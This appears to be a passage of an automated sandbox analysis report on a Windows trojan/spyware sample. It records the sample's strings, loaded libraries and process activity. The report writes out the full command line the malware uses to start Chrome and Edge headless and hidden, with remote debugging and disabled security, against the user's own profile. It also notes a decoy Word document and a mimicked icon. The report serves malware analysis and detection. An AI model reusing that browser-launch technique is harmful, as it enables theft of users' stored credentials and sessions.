      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Management.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSystem.Data.SQLite.dllF vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.provider.e_sqlite3.dllV vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.core.dllV vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameSQLitePCLRaw.batteries_v2.dllV vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exeBinary or memory string: get_Language$get_LegalCopyright&get_LegalTrademarks(get_OriginalFilename get_PrivateBuild(get_ProductBuildPart(get_ProductMajorPart(get_ProductMinorPart vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exeBinary or memory string: _legalCopyright"_originalFilename vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exeBinary or memory string: OriginalFilename vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exeBinary or memory string: OriginalFilenameSystem.Security.Cryptography.ProtectedData.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exeBinary or memory string: OriginalFilenameSystem.Management.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exeBinary or memory string: OriginalFilenameSystem.IO.Compression.dll@ vs nNnzvybxiy.exe
      Source: nNnzvybxiy.exeBinary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs nNnzvybxiy.exe
      Source: classification engineClassification label: mal80.troj.spyw.winEXE@16/21@5/6
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile created: C:\Users\Public\Documents\638724340890071225Jump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile created: C:\Users\user\AppData\Local\Temp\tmpnq23ga.tmpJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
      Source: nNnzvybxiy.exe, nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
      Source: nNnzvybxiy.exe, nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
      Source: nNnzvybxiy.exe, nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
      Source: nNnzvybxiy.exe, nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
      Source: nNnzvybxiy.exe, nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
      Source: nNnzvybxiy.exe, 00000000.00000003.1571184403.0000021C864D7000.00000004.00000020.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000003.1568971071.0000021C864D7000.00000004.00000020.00020000.00000000.sdmp, nNnzvybxiy.exe, 00000000.00000003.1530904496.0000021C85E1C000.00000004.00000020.00020000.00000000.sdmp, tmp2i5k3b.tmp.0.dr, Default_LoginDataTemp.db.0.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
      Source: nNnzvybxiy.exe, nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.drBinary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
      Source: unknownProcess created: C:\Users\user\Desktop\nNnzvybxiy.exe "C:\Users\user\Desktop\nNnzvybxiy.exe"
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9764 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headless
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1540 --field-trial-handle=1452,i,14790170528121727049,14815104510024520217,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1492,i,15216651291747389405,13479732914116494807,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9568 --user-data-dir="C:\Users\user\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9764 --user-data-dir="C:\Users\user\AppData\Local\Google\Chrome\User Data" --profile-directory="Default" --disable-popup-blocking --disable-extensions --disable-gpu --disable-software-rasterizer --disable-dev-shm-usage --no-sandbox --disable-logging --disable-crash-reporter --disable-web-security --allow-running-insecure-content --ignore-certificate-errors --disable-features=IsolateOrigins,site-per-process --disable-blink-features=AutomationControlled --disable-background-networking --disable-default-apps --disable-hang-monitor --disable-sync --disable-client-side-phishing-detection --disable-background-timer-throttling --disable-renderer-backgrounding --disable-backgrounding-occluded-windows --disable-ipc-flooding-protection --disable-site-isolation-trials --mute-audio --window-size=1280,720 --window-position=-3000,-3000 --headlessJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Documents\Your_Benefits_and_Role.docx" /o ""Jump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1540 --field-trial-handle=1452,i,14790170528121727049,14815104510024520217,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:3Jump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
      Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --no-sandbox --ignore-certificate-errors --use-angle=swiftshader-webgl --use-gl=angle --mute-audio --ignore-certificate-errors --headless --disable-logging --mojo-platform-channel-handle=1588 --field-trial-handle=1492,i,15216651291747389405,13479732914116494807,262144 --disable-features=IsolateOrigins,PaintHolding,site-per-process /prefetch:8Jump to behavior
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: dpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: icu.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: wshunix.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: winrnr.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: nlaapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: wshbth.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: devobj.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: pnrpnsp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: napinsp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: policymanager.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: msvcp110_win.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: vcruntime140_1.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: msvcp140.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: vcruntime140.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: xmllite.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: mlang.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: appresolver.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: bcp47langs.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: slc.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: sppc.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: onecorecommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeSection loaded: e_sqlite3.dllJump to behavior
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
      Source: nNnzvybxiy.exeStatic PE information: Image base 0x140000000 > 0x60000000
      Source: nNnzvybxiy.exeStatic file information: File size 26467328 > 1048576
      Source: nNnzvybxiy.exeStatic PE information: Raw size of .managed is bigger than: 0x100000 < 0x83ac00
      Source: nNnzvybxiy.exeStatic PE information: Raw size of .rdata is bigger than: 0x100000 < 0xfb7c00
      Source: nNnzvybxiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
      Source: nNnzvybxiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
      Source: nNnzvybxiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
      Source: nNnzvybxiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: nNnzvybxiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
      Source: nNnzvybxiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
      Source: nNnzvybxiy.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
      Source: nNnzvybxiy.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdbSHA256r source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.core\obj\Release\netstandard2.0\SQLitePCLRaw.core.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdb source: nNnzvybxiy.exe
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.IO.Compression\Release\net8.0-windows\System.IO.Compression.pdb source: nNnzvybxiy.exe
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdbSHA256kX source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Diagnostics.Process\Release\net8.0-windows\System.Diagnostics.Process.pdb source: nNnzvybxiy.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Security.Cryptography.ProtectedData/Release/net8.0/System.Security.Cryptography.ProtectedData.pdbSHA256 source: nNnzvybxiy.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdbSHA256@ source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: System.Diagnostics.Process.ni.pdb source: nNnzvybxiy.exe
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.bundle_green\obj\Release\netstandard2.0\SQLitePCLRaw.batteries_v2.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/Src/Newtonsoft.Json/obj/Release/net6.0/Newtonsoft.Json.pdbSHA256(s source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdbSHA256 source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\SQLitePCL.raw\SQLitePCL.raw\SQLitePCL.raw\src\SQLitePCLRaw.provider.e_sqlite3\obj\Release\net6.0\SQLitePCLRaw.provider.e_sqlite3.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: C:\Users\AnhXi\Downloads\Telegram Desktop\Projects\HK_NAVITE_DLL_v3_OKE\HK\bin\Release\net8.0\win-x64\native\oke.pdb source: nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF679802000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/EntityFramework/Release/netstandard2.1/EntityFramework.pdb source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF6795DA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: D:\a\cb\cb\cb\bld\bin\e_sqlite3\win\v142\plain\x64\e_sqlite3.pdb source: nNnzvybxiy.exe, 00000000.00000002.1579297011.00007FFB0C7D4000.00000002.00000001.01000000.00000007.sdmp, nNnzvybxiy.exe, 00000000.00000002.1574674815.000001DBF2107000.00000004.00001000.00020000.00000000.sdmp, e_sqlite3.dll.0.dr
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdbSHA256 source: nNnzvybxiy.exe
      Source: Binary string: System.IO.Compression.ni.pdb source: nNnzvybxiy.exe
      Source: Binary string: C:\dev\sqlite\dotnet-private\System.Data.SQLite\obj\Release\netstandard2.1\System.Data.SQLite.pdbSHA256 source: nNnzvybxiy.exe, 00000000.00000000.1249663619.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp, nNnzvybxiy.exe, 00000000.00000002.1577546621.00007FF678BDA000.00000002.00000001.01000000.00000003.sdmp
      Source: Binary string: /_/artifacts/obj/System.Management/Release/net8.0-windows/System.Management.pdb source: nNnzvybxiy.exe
      Source: nNnzvybxiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
      Source: nNnzvybxiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
      Source: nNnzvybxiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
      Source: nNnzvybxiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
      Source: nNnzvybxiy.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
      Source: nNnzvybxiy.exeStatic PE information: section name: .managed
      Source: nNnzvybxiy.exeStatic PE information: section name: hydrated
      Source: e_sqlite3.dll.0.drStatic PE information: section name: _RDATA
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeCode function: 0_2_00007FFB0C71CC82 push rbx; retn 000Ah0_2_00007FFB0C71CC89
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeFile created: C:\Users\user\Desktop\e_sqlite3.dllJump to dropped file

      Hooking and other Techniques for Hiding and Protection

      barindex
      Icon mismatch, binary includes an icon from a different legit application in order to fool users
      Source: initial sampleIcon embedded in binary file: icon matches a legit application icon: download (28).png
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdateJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\nNnzvybxiy.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
